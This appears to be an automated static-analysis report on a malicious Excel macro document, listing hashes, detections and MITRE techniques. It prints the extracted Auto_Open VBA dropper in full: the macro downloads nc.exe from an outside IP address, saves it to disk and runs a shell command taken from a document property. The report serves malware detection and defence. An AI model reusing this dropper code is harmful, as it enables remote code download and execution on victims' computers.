Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 08b33a9504ce5b22…

MALICIOUS

Office (OOXML)

29.5 KB Created: 2021-11-03 16:25:06 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-11-23
MD5: e7c026084aa8248b99e6eb229adc7053 SHA-1: 18a3f7ea51924e2e54c33ac882e9660dea67d433 SHA-256: 08b33a9504ce5b223aa8ee7672f0d05e2aa96d153d568787ce9b30b3a59e728a
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The Auto_Open VBA macro within this Excel document is designed to download a file named 'nc.exe' from the URL http://137.184.141.173:12124/nc.exe and save it to C:\Users\Public\Downloads\nc.exe. Subsequently, it attempts to execute the downloaded file using the Shell() function, leveraging the value of the 'Comments' document property. This behavior is indicative of a dropper malware.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
           Shell prop.Value
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        .write xHttp1.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp1: Set xHttp1 = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://137.184.141.173:12124/nc.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1790 bytes
SHA-256: 85661769711d0fd18b2d4b88b1865dc6541b899b752132110c2d71f5a48cc29d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()

Dim xHttp1: Set xHttp1 = CreateObject("Microsoft.XMLHTTP")
Dim bStrm1: Set bStrm1 = CreateObject("Adodb.Stream")
xHttp1.Open "GET", "http://137.184.141.173:12124/nc.exe", False
xHttp1.Send

With bStrm1
    .Type = 1 '//binary
    .Open
    .write xHttp1.responseBody
    .savetofile "C:\Users\Public\Downloads\nc.exe", 2 '//overwrite
End With

Dim prop As DocumentProperty
For Each prop In ActiveWorkbook.BuiltinDocumentProperties
    If prop.Name = "Comments" Then
       Shell prop.Value
    End If
Next
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 17920 bytes
SHA-256: e45c35bae194e1d5b4597f87f714e7ac08983436fc62bdb318167a4ab01cca54
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.